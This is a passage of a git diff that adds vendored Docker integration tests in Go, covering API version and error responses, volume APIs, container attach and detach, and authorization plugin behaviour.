+
+func (s *DockerSuite) TestAPIGetEnabledCORS(c *check.C) {
+	res, body, err := sockRequestRaw("GET", "/version", nil, "")
+	c.Assert(err, checker.IsNil)
+	c.Assert(res.StatusCode, checker.Equals, http.StatusOK)
+	body.Close()
+	// TODO: @runcom incomplete tests, why old integration tests had this headers
+	// and here none of the headers below are in the response?
+	//c.Log(res.Header)
+	//c.Assert(res.Header.Get("Access-Control-Allow-Origin"), check.Equals, "*")
+	//c.Assert(res.Header.Get("Access-Control-Allow-Headers"), check.Equals, "Origin, X-Requested-With, Content-Type, Accept, X-Registry-Auth")
+}
+
+func (s *DockerSuite) TestAPIClientVersionOldNotSupported(c *check.C) {
+	if daemonPlatform != runtime.GOOS {
+		c.Skip("Daemon platform doesn't match test platform")
+	}
+	if api.MinVersion == api.DefaultVersion {
+		c.Skip("API MinVersion==DefaultVersion")
+	}
+	v := strings.Split(api.MinVersion, ".")
+	vMinInt, err := strconv.Atoi(v[1])
+	c.Assert(err, checker.IsNil)
+	vMinInt--
+	v[1] = strconv.Itoa(vMinInt)
+	version := strings.Join(v, ".")
+
+	status, body, err := sockRequest("GET", "/v"+version+"/version", nil)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusBadRequest)
+	expected := fmt.Sprintf("client version %s is too old. Minimum supported API version is %s, please upgrade your client to a newer version", version, api.MinVersion)
+	c.Assert(strings.TrimSpace(string(body)), checker.Contains, expected)
+}
+
+func (s *DockerSuite) TestAPIDockerAPIVersion(c *check.C) {
+	var svrVersion string
+
+	server := httptest.NewServer(http.HandlerFunc(
+		func(w http.ResponseWriter, r *http.Request) {
+			w.Header().Set("API-Version", api.DefaultVersion)
+			url := r.URL.Path
+			svrVersion = url
+		}))
+	defer server.Close()
+
+	// Test using the env var first
+	result := icmd.RunCmd(icmd.Cmd{
+		Command: binaryWithArgs("-H="+server.URL[7:], "version"),
+		Env:     appendBaseEnv(false, "DOCKER_API_VERSION=xxx"),
+	})
+	c.Assert(result, icmd.Matches, icmd.Expected{Out: "API version:  xxx", ExitCode: 1})
+	c.Assert(svrVersion, check.Equals, "/vxxx/version", check.Commentf("%s", result.Compare(icmd.Success)))
+}
+
+func (s *DockerSuite) TestAPIErrorJSON(c *check.C) {
+	httpResp, body, err := sockRequestRaw("POST", "/containers/create", strings.NewReader(`{}`), "application/json")
+	c.Assert(err, checker.IsNil)
+	c.Assert(httpResp.StatusCode, checker.Equals, http.StatusInternalServerError)
+	c.Assert(httpResp.Header.Get("Content-Type"), checker.Equals, "application/json")
+	b, err := readBody(body)
+	c.Assert(err, checker.IsNil)
+	c.Assert(getErrorMessage(c, b), checker.Equals, "Config cannot be empty in order to create a container")
+}
+
+func (s *DockerSuite) TestAPIErrorPlainText(c *check.C) {
+	// Windows requires API 1.25 or later. This test is validating a behaviour which was present
+	// in v1.23, but changed in 1.24, hence not applicable on Windows. See apiVersionSupportsJSONErrors
+	testRequires(c, DaemonIsLinux)
+	httpResp, body, err := sockRequestRaw("POST", "/v1.23/containers/create", strings.NewReader(`{}`), "application/json")
+	c.Assert(err, checker.IsNil)
+	c.Assert(httpResp.StatusCode, checker.Equals, http.StatusInternalServerError)
+	c.Assert(httpResp.Header.Get("Content-Type"), checker.Contains, "text/plain")
+	b, err := readBody(body)
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(string(b)), checker.Equals, "Config cannot be empty in order to create a container")
+}
+
+func (s *DockerSuite) TestAPIErrorNotFoundJSON(c *check.C) {
+	// 404 is a different code path to normal errors, so test separately
+	httpResp, body, err := sockRequestRaw("GET", "/notfound", nil, "application/json")
+	c.Assert(err, checker.IsNil)
+	c.Assert(httpResp.StatusCode, checker.Equals, http.StatusNotFound)
+	c.Assert(httpResp.Header.Get("Content-Type"), checker.Equals, "application/json")
+	b, err := readBody(body)
+	c.Assert(err, checker.IsNil)
+	c.Assert(getErrorMessage(c, b), checker.Equals, "page not found")
+}
+
+func (s *DockerSuite) TestAPIErrorNotFoundPlainText(c *check.C) {
+	httpResp, body, err := sockRequestRaw("GET", "/v1.23/notfound", nil, "application/json")
+	c.Assert(err, checker.IsNil)
+	c.Assert(httpResp.StatusCode, checker.Equals, http.StatusNotFound)
+	c.Assert(httpResp.Header.Get("Content-Type"), checker.Contains, "text/plain")
+	b, err := readBody(body)
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(string(b)), checker.Equals, "page not found")
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_update_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_update_unix_test.go
new file mode 100644
index 0000000000..dfe14ec7b0
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_api_update_unix_test.go
@@ -0,0 +1,35 @@
+// +build !windows
+
+package main
+
+import (
+	"strings"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSuite) TestAPIUpdateContainer(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	testRequires(c, memoryLimitSupport)
+	testRequires(c, swapMemorySupport)
+
+	name := "apiUpdateContainer"
+	hostConfig := map[string]interface{}{
+		"Memory":     314572800,
+		"MemorySwap": 524288000,
+	}
+	dockerCmd(c, "run", "-d", "--name", name, "-m", "200M", "busybox", "top")
+	_, _, err := sockRequest("POST", "/containers/"+name+"/update", hostConfig)
+	c.Assert(err, check.IsNil)
+
+	c.Assert(inspectField(c, name, "HostConfig.Memory"), checker.Equals, "314572800")
+	file := "/sys/fs/cgroup/memory/memory.limit_in_bytes"
+	out, _ := dockerCmd(c, "exec", name, "cat", file)
+	c.Assert(strings.TrimSpace(out), checker.Equals, "314572800")
+
+	c.Assert(inspectField(c, name, "HostConfig.MemorySwap"), checker.Equals, "524288000")
+	file = "/sys/fs/cgroup/memory/memory.memsw.limit_in_bytes"
+	out, _ = dockerCmd(c, "exec", name, "cat", file)
+	c.Assert(strings.TrimSpace(out), checker.Equals, "524288000")
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_version_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_version_test.go
new file mode 100644
index 0000000000..eb2de5904a
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_api_version_test.go
@@ -0,0 +1,23 @@
+package main
+
+import (
+	"encoding/json"
+	"net/http"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/dockerversion"
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSuite) TestGetVersion(c *check.C) {
+	status, body, err := sockRequest("GET", "/version", nil)
+	c.Assert(status, checker.Equals, http.StatusOK)
+	c.Assert(err, checker.IsNil)
+
+	var v types.Version
+
+	c.Assert(json.Unmarshal(body, &v), checker.IsNil)
+
+	c.Assert(v.Version, checker.Equals, dockerversion.Version, check.Commentf("Version mismatch"))
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_volumes_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_volumes_test.go
new file mode 100644
index 0000000000..d1d44005e0
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_api_volumes_test.go
@@ -0,0 +1,89 @@
+package main
+
+import (
+	"encoding/json"
+	"net/http"
+	"path/filepath"
+
+	"github.com/docker/docker/api/types"
+	volumetypes "github.com/docker/docker/api/types/volume"
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSuite) TestVolumesAPIList(c *check.C) {
+	prefix, _ := getPrefixAndSlashFromDaemonPlatform()
+	dockerCmd(c, "run", "-v", prefix+"/foo", "busybox")
+
+	status, b, err := sockRequest("GET", "/volumes", nil)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusOK)
+
+	var volumes volumetypes.VolumesListOKBody
+	c.Assert(json.Unmarshal(b, &volumes), checker.IsNil)
+
+	c.Assert(len(volumes.Volumes), checker.Equals, 1, check.Commentf("\n%v", volumes.Volumes))
+}
+
+func (s *DockerSuite) TestVolumesAPICreate(c *check.C) {
+	config := volumetypes.VolumesCreateBody{
+		Name: "test",
+	}
+	status, b, err := sockRequest("POST", "/volumes/create", config)
+	c.Assert(err, check.IsNil)
+	c.Assert(status, check.Equals, http.StatusCreated, check.Commentf(string(b)))
+
+	var vol types.Volume
+	err = json.Unmarshal(b, &vol)
+	c.Assert(err, checker.IsNil)
+
+	c.Assert(filepath.Base(filepath.Dir(vol.Mountpoint)), checker.Equals, config.Name)
+}
+
+func (s *DockerSuite) TestVolumesAPIRemove(c *check.C) {
+	prefix, _ := getPrefixAndSlashFromDaemonPlatform()
+	dockerCmd(c, "run", "-v", prefix+"/foo", "--name=test", "busybox")
+
+	status, b, err := sockRequest("GET", "/volumes", nil)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusOK)
+
+	var volumes volumetypes.VolumesListOKBody
+	c.Assert(json.Unmarshal(b, &volumes), checker.IsNil)
+	c.Assert(len(volumes.Volumes), checker.Equals, 1, check.Commentf("\n%v", volumes.Volumes))
+
+	v := volumes.Volumes[0]
+	status, _, err = sockRequest("DELETE", "/volumes/"+v.Name, nil)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusConflict, check.Commentf("Should not be able to remove a volume that is in use"))
+
+	dockerCmd(c, "rm", "-f", "test")
+	status, data, err := sockRequest("DELETE", "/volumes/"+v.Name, nil)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusNoContent, check.Commentf(string(data)))
+
+}
+
+func (s *DockerSuite) TestVolumesAPIInspect(c *check.C) {
+	config := volumetypes.VolumesCreateBody{
+		Name: "test",
+	}
+	status, b, err := sockRequest("POST", "/volumes/create", config)
+	c.Assert(err, check.IsNil)
+	c.Assert(status, check.Equals, http.StatusCreated, check.Commentf(string(b)))
+
+	status, b, err = sockRequest("GET", "/volumes", nil)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusOK, check.Commentf(string(b)))
+
+	var volumes volumetypes.VolumesListOKBody
+	c.Assert(json.Unmarshal(b, &volumes), checker.IsNil)
+	c.Assert(len(volumes.Volumes), checker.Equals, 1, check.Commentf("\n%v", volumes.Volumes))
+
+	var vol types.Volume
+	status, b, err = sockRequest("GET", "/volumes/"+config.Name, nil)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusOK, check.Commentf(string(b)))
+	c.Assert(json.Unmarshal(b, &vol), checker.IsNil)
+	c.Assert(vol.Name, checker.Equals, config.Name)
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_attach_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_attach_test.go
new file mode 100644
index 0000000000..2df4fdc4d2
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_attach_test.go
@@ -0,0 +1,168 @@
+package main
+
+import (
+	"bufio"
+	"fmt"
+	"io"
+	"os/exec"
+	"runtime"
+	"strings"
+	"sync"
+	"time"
+
+	icmd "github.com/docker/docker/pkg/integration/cmd"
+	"github.com/go-check/check"
+)
+
+const attachWait = 5 * time.Second
+
+func (s *DockerSuite) TestAttachMultipleAndRestart(c *check.C) {
+	endGroup := &sync.WaitGroup{}
+	startGroup := &sync.WaitGroup{}
+	endGroup.Add(3)
+	startGroup.Add(3)
+
+	err := waitForContainer("attacher", "-d", "busybox", "/bin/sh", "-c", "while true; do sleep 1; echo hello; done")
+	c.Assert(err, check.IsNil)
+
+	startDone := make(chan struct{})
+	endDone := make(chan struct{})
+
+	go func() {
+		endGroup.Wait()
+		close(endDone)
+	}()
+
+	go func() {
+		startGroup.Wait()
+		close(startDone)
+	}()
+
+	for i := 0; i < 3; i++ {
+		go func() {
+			cmd := exec.Command(dockerBinary, "attach", "attacher")
+
+			defer func() {
+				cmd.Wait()
+				endGroup.Done()
+			}()
+
+			out, err := cmd.StdoutPipe()
+			if err != nil {
+				c.Fatal(err)
+			}
+			defer out.Close()
+
+			if err := cmd.Start(); err != nil {
+				c.Fatal(err)
+			}
+
+			buf := make([]byte, 1024)
+
+			if _, err := out.Read(buf); err != nil && err != io.EOF {
+				c.Fatal(err)
+			}
+
+			startGroup.Done()
+
+			if !strings.Contains(string(buf), "hello") {
+				c.Fatalf("unexpected output %s expected hello\n", string(buf))
+			}
+		}()
+	}
+
+	select {
+	case <-startDone:
+	case <-time.After(attachWait):
+		c.Fatalf("Attaches did not initialize properly")
+	}
+
+	dockerCmd(c, "kill", "attacher")
+
+	select {
+	case <-endDone:
+	case <-time.After(attachWait):
+		c.Fatalf("Attaches did not finish properly")
+	}
+}
+
+func (s *DockerSuite) TestAttachTTYWithoutStdin(c *check.C) {
+	out, _ := dockerCmd(c, "run", "-d", "-ti", "busybox")
+
+	id := strings.TrimSpace(out)
+	c.Assert(waitRun(id), check.IsNil)
+
+	done := make(chan error)
+	go func() {
+		defer close(done)
+
+		cmd := exec.Command(dockerBinary, "attach", id)
+		if _, err := cmd.StdinPipe(); err != nil {
+			done <- err
+			return
+		}
+
+		expected := "the input device is not a TTY"
+		if runtime.GOOS == "windows" {
+			expected += ".  If you are using mintty, try prefixing the command with 'winpty'"
+		}
+		if out, _, err := runCommandWithOutput(cmd); err == nil {
+			done <- fmt.Errorf("attach should have failed")
+			return
+		} else if !strings.Contains(out, expected) {
+			done <- fmt.Errorf("attach failed with error %q: expected %q", out, expected)
+			return
+		}
+	}()
+
+	select {
+	case err := <-done:
+		c.Assert(err, check.IsNil)
+	case <-time.After(attachWait):
+		c.Fatal("attach is running but should have failed")
+	}
+}
+
+func (s *DockerSuite) TestAttachDisconnect(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	out, _ := dockerCmd(c, "run", "-di", "busybox", "/bin/cat")
+	id := strings.TrimSpace(out)
+
+	cmd := exec.Command(dockerBinary, "attach", id)
+	stdin, err := cmd.StdinPipe()
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer stdin.Close()
+	stdout, err := cmd.StdoutPipe()
+	c.Assert(err, check.IsNil)
+	defer stdout.Close()
+	c.Assert(cmd.Start(), check.IsNil)
+	defer cmd.Process.Kill()
+
+	_, err = stdin.Write([]byte("hello\n"))
+	c.Assert(err, check.IsNil)
+	out, err = bufio.NewReader(stdout).ReadString('\n')
+	c.Assert(err, check.IsNil)
+	c.Assert(strings.TrimSpace(out), check.Equals, "hello")
+
+	c.Assert(stdin.Close(), check.IsNil)
+
+	// Expect container to still be running after stdin is closed
+	running := inspectField(c, id, "State.Running")
+	c.Assert(running, check.Equals, "true")
+}
+
+func (s *DockerSuite) TestAttachPausedContainer(c *check.C) {
+	testRequires(c, IsPausable)
+	defer unpauseAllContainers()
+	runSleepingContainer(c, "-d", "--name=test")
+	dockerCmd(c, "pause", "test")
+
+	result := dockerCmdWithResult("attach", "test")
+	c.Assert(result, icmd.Matches, icmd.Expected{
+		Error:    "exit status 1",
+		ExitCode: 1,
+		Err:      "You cannot attach to a paused container, unpause it first",
+	})
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_attach_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_attach_unix_test.go
new file mode 100644
index 0000000000..fb794ccc40
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_attach_unix_test.go
@@ -0,0 +1,237 @@
+// +build !windows
+
+package main
+
+import (
+	"bufio"
+	"io/ioutil"
+	"os/exec"
+	"strings"
+	"time"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/go-check/check"
+	"github.com/kr/pty"
+)
+
+// #9860 Make sure attach ends when container ends (with no errors)
+func (s *DockerSuite) TestAttachClosedOnContainerStop(c *check.C) {
+	testRequires(c, SameHostDaemon)
+
+	out, _ := dockerCmd(c, "run", "-dti", "busybox", "/bin/sh", "-c", `trap 'exit 0' SIGTERM; while true; do sleep 1; done`)
+
+	id := strings.TrimSpace(out)
+	c.Assert(waitRun(id), check.IsNil)
+
+	pty, tty, err := pty.Open()
+	c.Assert(err, check.IsNil)
+
+	attachCmd := exec.Command(dockerBinary, "attach", id)
+	attachCmd.Stdin = tty
+	attachCmd.Stdout = tty
+	attachCmd.Stderr = tty
+	err = attachCmd.Start()
+	c.Assert(err, check.IsNil)
+
+	errChan := make(chan error)
+	go func() {
+		time.Sleep(300 * time.Millisecond)
+		defer close(errChan)
+		// Container is waiting for us to signal it to stop
+		dockerCmd(c, "stop", id)
+		// And wait for the attach command to end
+		errChan <- attachCmd.Wait()
+	}()
+
+	// Wait for the docker to end (should be done by the
+	// stop command in the go routine)
+	dockerCmd(c, "wait", id)
+
+	select {
+	case err := <-errChan:
+		tty.Close()
+		out, _ := ioutil.ReadAll(pty)
+		c.Assert(err, check.IsNil, check.Commentf("out: %v", string(out)))
+	case <-time.After(attachWait):
+		c.Fatal("timed out without attach returning")
+	}
+
+}
+
+func (s *DockerSuite) TestAttachAfterDetach(c *check.C) {
+	name := "detachtest"
+
+	cpty, tty, err := pty.Open()
+	c.Assert(err, checker.IsNil, check.Commentf("Could not open pty: %v", err))
+	cmd := exec.Command(dockerBinary, "run", "-ti", "--name", name, "busybox")
+	cmd.Stdin = tty
+	cmd.Stdout = tty
+	cmd.Stderr = tty
+
+	errChan := make(chan error)
+	go func() {
+		errChan <- cmd.Run()
+		close(errChan)
+	}()
+
+	c.Assert(waitRun(name), check.IsNil)
+
+	cpty.Write([]byte{16})
+	time.Sleep(100 * time.Millisecond)
+	cpty.Write([]byte{17})
+
+	select {
+	case err := <-errChan:
+		if err != nil {
+			buff := make([]byte, 200)
+			tty.Read(buff)
+			c.Fatalf("%s: %s", err, buff)
+		}
+	case <-time.After(5 * time.Second):
+		c.Fatal("timeout while detaching")
+	}
+
+	cpty, tty, err = pty.Open()
+	c.Assert(err, checker.IsNil, check.Commentf("Could not open pty: %v", err))
+
+	cmd = exec.Command(dockerBinary, "attach", name)
+	cmd.Stdin = tty
+	cmd.Stdout = tty
+	cmd.Stderr = tty
+
+	err = cmd.Start()
+	c.Assert(err, checker.IsNil)
+
+	bytes := make([]byte, 10)
+	var nBytes int
+	readErr := make(chan error, 1)
+
+	go func() {
+		time.Sleep(500 * time.Millisecond)
+		cpty.Write([]byte("\n"))
+		time.Sleep(500 * time.Millisecond)
+
+		nBytes, err = cpty.Read(bytes)
+		cpty.Close()
+		readErr <- err
+	}()
+
+	select {
+	case err := <-readErr:
+		c.Assert(err, check.IsNil)
+	case <-time.After(2 * time.Second):
+		c.Fatal("timeout waiting for attach read")
+	}
+
+	err = cmd.Wait()
+	c.Assert(err, checker.IsNil)
+
+	c.Assert(string(bytes[:nBytes]), checker.Contains, "/ #")
+
+}
+
+// TestAttachDetach checks that attach in tty mode can be detached using the long container ID
+func (s *DockerSuite) TestAttachDetach(c *check.C) {
+	out, _ := dockerCmd(c, "run", "-itd", "busybox", "cat")
+	id := strings.TrimSpace(out)
+	c.Assert(waitRun(id), check.IsNil)
+
+	cpty, tty, err := pty.Open()
+	c.Assert(err, check.IsNil)
+	defer cpty.Close()
+
+	cmd := exec.Command(dockerBinary, "attach", id)
+	cmd.Stdin = tty
+	stdout, err := cmd.StdoutPipe()
+	c.Assert(err, check.IsNil)
+	defer stdout.Close()
+	err = cmd.Start()
+	c.Assert(err, check.IsNil)
+	c.Assert(waitRun(id), check.IsNil)
+
+	_, err = cpty.Write([]byte("hello\n"))
+	c.Assert(err, check.IsNil)
+	out, err = bufio.NewReader(stdout).ReadString('\n')
+	c.Assert(err, check.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Equals, "hello", check.Commentf("expected 'hello', got %q", out))
+
+	// escape sequence
+	_, err = cpty.Write([]byte{16})
+	c.Assert(err, checker.IsNil)
+	time.Sleep(100 * time.Millisecond)
+	_, err = cpty.Write([]byte{17})
+	c.Assert(err, checker.IsNil)
+
+	ch := make(chan struct{})
+	go func() {
+		cmd.Wait()
+		ch <- struct{}{}
+	}()
+
+	running := inspectField(c, id, "State.Running")
+	c.Assert(running, checker.Equals, "true", check.Commentf("expected container to still be running"))
+
+	go func() {
+		dockerCmd(c, "kill", id)
+	}()
+
+	select {
+	case <-ch:
+	case <-time.After(10 * time.Millisecond):
+		c.Fatal("timed out waiting for container to exit")
+	}
+
+}
+
+// TestAttachDetachTruncatedID checks that attach in tty mode can be detached
+func (s *DockerSuite) TestAttachDetachTruncatedID(c *check.C) {
+	out, _ := dockerCmd(c, "run", "-itd", "busybox", "cat")
+	id := stringid.TruncateID(strings.TrimSpace(out))
+	c.Assert(waitRun(id), check.IsNil)
+
+	cpty, tty, err := pty.Open()
+	c.Assert(err, checker.IsNil)
+	defer cpty.Close()
+
+	cmd := exec.Command(dockerBinary, "attach", id)
+	cmd.Stdin = tty
+	stdout, err := cmd.StdoutPipe()
+	c.Assert(err, checker.IsNil)
+	defer stdout.Close()
+	err = cmd.Start()
+	c.Assert(err, checker.IsNil)
+
+	_, err = cpty.Write([]byte("hello\n"))
+	c.Assert(err, checker.IsNil)
+	out, err = bufio.NewReader(stdout).ReadString('\n')
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Equals, "hello", check.Commentf("expected 'hello', got %q", out))
+
+	// escape sequence
+	_, err = cpty.Write([]byte{16})
+	c.Assert(err, checker.IsNil)
+	time.Sleep(100 * time.Millisecond)
+	_, err = cpty.Write([]byte{17})
+	c.Assert(err, checker.IsNil)
+
+	ch := make(chan struct{})
+	go func() {
+		cmd.Wait()
+		ch <- struct{}{}
+	}()
+
+	running := inspectField(c, id, "State.Running")
+	c.Assert(running, checker.Equals, "true", check.Commentf("expected container to still be running"))
+
+	go func() {
+		dockerCmd(c, "kill", id)
+	}()
+
+	select {
+	case <-ch:
+	case <-time.After(10 * time.Millisecond):
+		c.Fatal("timed out waiting for container to exit")
+	}
+
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_authz_plugin_v2_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_authz_plugin_v2_test.go
new file mode 100644
index 0000000000..8a669fb379
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_authz_plugin_v2_test.go
@@ -0,0 +1,133 @@
+// +build !windows
+
+package main
+
+import (
+	"fmt"
+	"strings"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+var (
+	authzPluginName            = "riyaz/authz-no-volume-plugin"
+	authzPluginTag             = "latest"
+	authzPluginNameWithTag     = authzPluginName + ":" + authzPluginTag
+	authzPluginBadManifestName = "riyaz/authz-plugin-bad-manifest"
+	nonexistentAuthzPluginName = "riyaz/nonexistent-authz-plugin"
+)
+
+func init() {
+	check.Suite(&DockerAuthzV2Suite{
+		ds: &DockerSuite{},
+	})
+}
+
+type DockerAuthzV2Suite struct {
+	ds *DockerSuite
+	d  *Daemon
+}
+
+func (s *DockerAuthzV2Suite) SetUpTest(c *check.C) {
+	testRequires(c, DaemonIsLinux, Network)
+	s.d = NewDaemon(c)
+	c.Assert(s.d.Start(), check.IsNil)
+}
+
+func (s *DockerAuthzV2Suite) TearDownTest(c *check.C) {
+	s.d.Stop()
+	s.ds.TearDownTest(c)
+}
+
+func (s *DockerAuthzV2Suite) TestAuthZPluginAllowNonVolumeRequest(c *check.C) {
+	testRequires(c, DaemonIsLinux, IsAmd64, Network)
+	// Install authz plugin
+	_, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", authzPluginNameWithTag)
+	c.Assert(err, checker.IsNil)
+	// start the daemon with the plugin and load busybox, --net=none build fails otherwise
+	// because it needs to pull busybox
+	c.Assert(s.d.Restart("--authorization-plugin="+authzPluginNameWithTag), check.IsNil)
+	c.Assert(s.d.LoadBusybox(), check.IsNil)
+
+	// defer disabling the plugin
+	defer func() {
+		c.Assert(s.d.Restart(), check.IsNil)
+		_, err = s.d.Cmd("plugin", "disable", authzPluginNameWithTag)
+		c.Assert(err, checker.IsNil)
+		_, err = s.d.Cmd("plugin", "rm", authzPluginNameWithTag)
+		c.Assert(err, checker.IsNil)
+	}()
+
+	// Ensure docker run command and accompanying docker ps are successful
+	out, err := s.d.Cmd("run", "-d", "busybox", "top")
+	c.Assert(err, check.IsNil)
+
+	id := strings.TrimSpace(out)
+
+	out, err = s.d.Cmd("ps")
+	c.Assert(err, check.IsNil)
+	c.Assert(assertContainerList(out, []string{id}), check.Equals, true)
+}
+
+func (s *DockerAuthzV2Suite) TestAuthZPluginRejectVolumeRequests(c *check.C) {
+	testRequires(c, DaemonIsLinux, IsAmd64, Network)
+	// Install authz plugin
+	_, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", authzPluginNameWithTag)
+	c.Assert(err, checker.IsNil)
+
+	// restart the daemon with the plugin
+	c.Assert(s.d.Restart("--authorization-plugin="+authzPluginNameWithTag), check.IsNil)
+
+	// defer disabling the plugin
+	defer func() {
+		c.Assert(s.d.Restart(), check.IsNil)
+		_, err = s.d.Cmd("plugin", "disable", authzPluginNameWithTag)
+		c.Assert(err, checker.IsNil)
+		_, err = s.d.Cmd("plugin", "rm", authzPluginNameWithTag)
+		c.Assert(err, checker.IsNil)
+	}()
+
+	out, err := s.d.Cmd("volume", "create")
+	c.Assert(err, check.NotNil)
+	c.Assert(out, checker.Contains, fmt.Sprintf("Error response from daemon: plugin %s failed with error:", authzPluginNameWithTag))
+
+	out, err = s.d.Cmd("volume", "ls")
+	c.Assert(err, check.NotNil)
+	c.Assert(out, checker.Contains, fmt.Sprintf("Error response from daemon: plugin %s failed with error:", authzPluginNameWithTag))
+
+	// The plugin will block the command before it can determine the volume does not exist
+	out, err = s.d.Cmd("volume", "rm", "test")
+	c.Assert(err, check.NotNil)
+	c.Assert(out, checker.Contains, fmt.Sprintf("Error response from daemon: plugin %s failed with error:", authzPluginNameWithTag))
+
+	out, err = s.d.Cmd("volume", "inspect", "test")
+	c.Assert(err, check.NotNil)
+	c.Assert(out, checker.Contains, fmt.Sprintf("Error response from daemon: plugin %s failed with error:", authzPluginNameWithTag))
+
+	out, err = s.d.Cmd("volume", "prune", "-f")
+	c.Assert(err, check.NotNil)
+	c.Assert(out, checker.Contains, fmt.Sprintf("Error response from daemon: plugin %s failed with error:", authzPluginNameWithTag))
+}
+
+func (s *DockerAuthzV2Suite) TestAuthZPluginBadManifestFailsDaemonStart(c *check.C) {
+	testRequires(c, DaemonIsLinux, IsAmd64, Network)
+	// Install authz plugin with bad manifest
+	_, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", authzPluginBadManifestName)
+	c.Assert(err, checker.IsNil)
+
+	// start the daemon with the plugin, it will error
+	c.Assert(s.d.Restart("--authorization-plugin="+authzPluginBadManifestName), check.NotNil)
+
+	// restarting the daemon without requiring the plugin will succeed
+	c.Assert(s.d.Restart(), check.IsNil)
+}
+
+func (s *DockerAuthzV2Suite) TestNonexistentAuthZPluginFailsDaemonStart(c *check.C) {
+	testRequires(c, DaemonIsLinux, Network)
+	// start the daemon with a non-existent authz plugin, it will error
+	c.Assert(s.d.Restart("--authorization-plugin="+nonexistentAuthzPluginName), check.NotNil)
+
+	// restarting the daemon without requiring the plugin will succeed
+	c.Assert(s.d.Restart(), check.IsNil)
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_authz_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_authz_unix_test.go
new file mode 100644
index 0000000000..a826249e2e
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_authz_unix_test.go
@@ -0,0 +1,477 @@
+// +build !windows
+
+package main
+
+import (
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"net/http/httptest"
+	"os"
+	"path/filepath"
+	"strings"
+
+	"bufio"
+	"bytes"
+	"os/exec"
+	"strconv"
+	"time"
+
+	"net"
+	"net/http/httputil"
+	"net/url"
+
+	"github.com/docker/docker/pkg/authorization"
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/pkg/plugins"
+	"github.com/go-check/check"
+)
+
+const (
+	testAuthZPlugin     = "authzplugin"
+	unauthorizedMessage = "User unauthorized authz plugin"
+	errorMessage        = "something went wrong..."
+	containerListAPI    = "/containers/json"
+)
+
+var (
+	alwaysAllowed = []string{"/_ping", "/info"}
+)
+
+func init() {
+	check.Suite(&DockerAuthzSuite{
+		ds: &DockerSuite{},
+	})
+}
+
+type DockerAuthzSuite struct {
+	server *httptest.Server
+	ds     *DockerSuite
+	d      *Daemon
+	ctrl   *authorizationController
+}
+
+type authorizationController struct {
+	reqRes        authorization.Response // reqRes holds the plugin response to the initial client request
+	resRes        authorization.Response // resRes holds the plugin response to the daemon response
+	psRequestCnt  int                    // psRequestCnt counts the number of calls to list container request api
+	psResponseCnt int                    // psResponseCnt counts the number of calls to list containers response API
+	requestsURIs  []string               // requestsURIs stores all request URIs that are sent to the authorization controller
+	reqUser       string
+	resUser       string
+}
+
+func (s *DockerAuthzSuite) SetUpTest(c *check.C) {
+	s.d = NewDaemon(c)
+	s.ctrl = &authorizationController{}
+}
+
+func (s *DockerAuthzSuite) TearDownTest(c *check.C) {
+	s.d.Stop()
+	s.ds.TearDownTest(c)
+	s.ctrl = nil
+}
+
+func (s *DockerAuthzSuite) SetUpSuite(c *check.C) {
+	mux := http.NewServeMux()
+	s.server = httptest.NewServer(mux)
+
+	mux.HandleFunc("/Plugin.Activate", func(w http.ResponseWriter, r *http.Request) {
+		b, err := json.Marshal(plugins.Manifest{Implements: []string{authorization.AuthZApiImplements}})
+		c.Assert(err, check.IsNil)
+		w.Write(b)
+	})
+
